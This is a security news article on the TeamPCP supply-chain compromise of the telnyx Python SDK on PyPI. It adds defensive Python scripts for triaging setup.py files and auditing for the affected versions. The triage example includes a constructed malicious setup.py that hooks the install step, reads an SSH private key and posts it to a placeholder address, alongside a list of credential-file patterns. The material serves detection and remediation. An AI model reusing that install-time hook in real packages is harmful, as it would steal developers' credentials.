Cyberwire Daily
TeamPCP Targets Telnyx Package in Latest Software Supply Chain Attack

By Team-CWD, March 27, 2026
TeamPCP has again expanded its supply chain attacks on open-source repositories, this time by targeting Telnyx, according to security researchers.

The threat group recently rose to notoriety by uploading malicious packages to the Python Package Index (PyPI), the official online repository where developers share and download Python software packages. The group typically uses typosquatting, publishing packages whose names closely resemble popular ones, to trick developers into installing them.

In one campaign, the group targeted Trivy, a widely used open-source vulnerability scanner owned by Aqua Security, by injecting credential-stealing malware into official releases and GitHub Actions.

A few days later, researchers discovered TeamPCP targeted LiteLLM AI Gateway, a popular Python library for AI model integration.

Now, a third TeamPCP campaign has been identified which affects the Telnyx Python package on PyPI and leads to the delivery of credential-stealing malware.

Telnyx is a cloud communications platform that provides application programming interfaces (APIs) for phone calls, SMS, MMS and other telecom services.

TeamPCP’s Telnyx Compromise Campaign Explained

On March 27, researchers from both Socket and Endor Labs published findings revealing that the official Telnyx Python software development kit (SDK) had been compromised in a software supply chain attack.

Socket researchers identified that the telnyx package, a legitimate and widely used Python SDK for the Telnyx communications platform, had been tampered with. The malicious versions published to PyPI – versions 4.87.1 and 4.87.2 – contained code designed to exfiltrate sensitive information from victim environments.

“They should not be used,” warned the Socket Research Team, whose members confirmed that researchers at Aikido Security and Wiz, now part of Google Cloud, independently came to the same conclusions.

Socket found that the attacker had injected functionality to steal SSH private keys and bash history files from compromised systems, sending that data to an attacker-controlled remote server. The malicious payload was designed to execute at install time, meaning a developer or automated pipeline simply installing or updating the package would trigger the attack without needing to import or run any of the package’s actual functionality.

Endor Labs researchers confirmed Socket’s findings and further explained that the threat actor gained the ability to publish malicious versions of the telnyx package by compromising the credentials of a maintainer account.

This is a particularly dangerous attack vector because it does not require any vulnerability in PyPI's own infrastructure: the index did exactly what it is supposed to do and accepted a release from an authenticated maintainer.

Instead, the attacker leveraged legitimate publishing access to push trojanized versions that would appear authentic to any automated or manual dependency resolution process.

Because the package retained its legitimate name and continued to function as expected for its intended purpose, detection through casual inspection or functional testing would be extremely difficult.

Socket researchers noted that the injected payload specifically targeted files that would be of high value in a lateral movement or credential harvesting context.

SSH private keys would allow an attacker to pivot to other systems the victim has access to, while bash history files could expose commands containing credentials, server addresses, internal tooling or other sensitive operational information. The data exfiltration was performed over HTTP to an external endpoint controlled by the attacker.
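The two points above, that the payload ran at install time and that it went after SSH keys and bash history, can be turned into a triage check. On PyPI, code running at install time means the installer executed the package's build script (a setup.py in an sdist); a pure wheel is only unpacked, although a wheel can still run code on first import or via a .pth file. The following is an added example of a static triage pass over a setup.py, written for this page; it is not Socket's or Endor Labs' tooling and not the actual telnyx payload, whose code this page does not reproduce. The suspicious setup.py, the 203.0.113.10 address and the list of flagged call names are all constructed for illustration.

```python
"""Static triage of a Python sdist's setup.py for install-time execution paths.

Added example, not the Socket / Endor Labs analysis and not the real telnyx payload.
Heuristics: an install/develop command override, network or process-spawning calls,
and string literals naming credential files. Sample input below is constructed."""
import ast

# Call names (bare or attribute) that rarely belong in a build script. Assumed list.
SUSPICIOUS_CALLS = {"urlopen", "urlretrieve", "Popen", "system", "check_output",
                    "exec", "eval", "b64decode"}
# Substrings that point at the kind of files the article says were stolen, plus a few peers.
SENSITIVE_PATHS = (".ssh", "id_rsa", "id_ed25519", ".bash_history", ".aws", ".netrc")
# setuptools command classes whose subclassing lets code run during pip install.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}


def _call_name(node):
    """Name of the called function: f() -> 'f', mod.f() -> 'f'."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""


def triage_setup_py(source):
    """Return sorted [(finding, line_no)] for a setup.py source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            # setup(cmdclass={"install": X}) swaps the install step for attacker-controlled code
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(("cmdclass_override", node.lineno))
            if name in SUSPICIOUS_CALLS:
                findings.append((f"call:{name}", node.lineno))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                bname = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")
                if bname in INSTALL_HOOKS:
                    findings.append((f"subclasses_{bname}", node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for path in SENSITIVE_PATHS:
                if path in node.value:
                    findings.append((f"path:{path}", node.lineno))
    return sorted(findings, key=lambda f: (f[1], f[0]))


# Constructed sample: a setup.py that reads an SSH key and posts it during install.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        key = open(os.path.expanduser("~/.ssh/id_rsa")).read()
        urllib.request.urlopen("http://203.0.113.10/collect", data=key.encode())

setup(name="example-pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''


def demo():
    """Triage the constructed sample; returns the findings list."""
    return triage_setup_py(SAMPLE_SETUP_PY)


if __name__ == "__main__":
    for finding, line_no in demo():
        print(f"line {line_no}: {finding}")
```

To use it on a real release, fetch the sdist archive from the index and unpack it in a sandbox; do not point pip at it, because pip generates sdist metadata by executing setup.py, which is exactly the step a payload of this kind hooks. Treat the result as triage, not a verdict: a clean pass says nothing about obfuscated or dynamically loaded code.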

Telnyx Campaign Reflects TeamPCP’s Growing Sophistication

Endor Labs researchers emphasized that the pattern exhibited by TeamPCP reflects a maturation in supply chain attack methodology.

Rather than relying solely on typosquatting, which depends on a developer making a naming mistake, this actor has demonstrated the capability and willingness to directly compromise legitimate, trusted packages with real user bases.

Endor Labs researchers argued that this significantly raises the risk profile because developers and security teams who explicitly trust a known package and pin to it by name are not protected against this class of attack.

The three-day interval between the LiteLLM and Telnyx compromises also suggested that the actor was actively iterating and moving quickly across targets rather than executing a single opportunistic event.

According to Socket, TeamPCP has recently started partnering with the Vect ransomware group to turn supply chain compromises into large-scale ransomware operations.

Socket and Endor Labs researchers recommended that organizations audit their environments for the presence of the malicious versions and rotate any credentials or keys that may have been exposed on systems where the compromised package was installed.
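The audit step above is mechanical enough to script. The following is an added example written for this page, not Socket's or Endor Labs' tooling; it assumes, as the article states, that the only trojanized releases are telnyx 4.87.1 and 4.87.2, and that the inputs are requirements.txt-style exact pins, `pip freeze` output, or the installed distributions of the running interpreter. The sample requirements file is constructed.

```python
"""Audit pin files and an installed environment for the compromised telnyx releases.

Added example for the remediation step described in the article; not vendor tooling.
Assumption: affected releases are exactly 4.87.1 and 4.87.2 (per the article)."""
import re
from importlib import metadata

# Versions the article reports as trojanized, keyed by normalized project name.
AFFECTED = {"telnyx": {"4.87.1", "4.87.2"}}

# "name==version"; extras and environment markers after the version are ignored.
PIN_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][0-9A-Za-z.]*)")


def normalize(name):
    """PEP 503 name normalization so 'Telnyx' and 'telnyx' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_affected_pins(text):
    """Return [(line_no, name, version)] for exact pins that select an affected release."""
    hits = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0]          # strip trailing comments
        m = PIN_RE.match(line)
        if not m:
            continue                         # ranges like telnyx>=4.87 are not exact pins
        name, version = normalize(m.group(1)), m.group(2)
        if version in AFFECTED.get(name, ()):
            hits.append((line_no, name, version))
    return hits


def find_affected_installed(distributions=None):
    """Return [(name, version)] for affected releases among installed distributions.
    Defaults to the running interpreter's site-packages via importlib.metadata."""
    if distributions is None:
        distributions = [(d.metadata.get("Name") or "", d.version)
                         for d in metadata.distributions()]
    return [(normalize(n), v) for n, v in distributions
            if v in AFFECTED.get(normalize(n), ())]


def exclusion_constraint(name):
    """pip constraint line (constraints.txt / -c) that refuses the affected releases."""
    return name + ",".join(f"!={v}" for v in sorted(AFFECTED[name]))


# Constructed sample requirements file; line 2 is the problem, line 3 is a safe older pin.
SAMPLE_REQUIREMENTS = """requests==2.32.3
telnyx==4.87.1   # bumped by an automated dependency update
Telnyx==4.87.0
"""

if __name__ == "__main__":
    print("pins:", find_affected_pins(SAMPLE_REQUIREMENTS))
    print("installed:", find_affected_installed())
    print("constraint:", exclusion_constraint("telnyx"))
```

Two caveats when acting on the output. First, a hit in a pin file is itself the exposure: the lock was taken after the bad release existed, so every host or CI job that installed from it ran the payload and its SSH keys and shell history should be treated as disclosed, regardless of whether the package was ever imported. Second, hash-pinned lock files (pip's `--require-hashes` mode) only help when the lock predates the malicious release; a lock regenerated to 4.87.1 records the trojanized file's hash and will install it faithfully.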
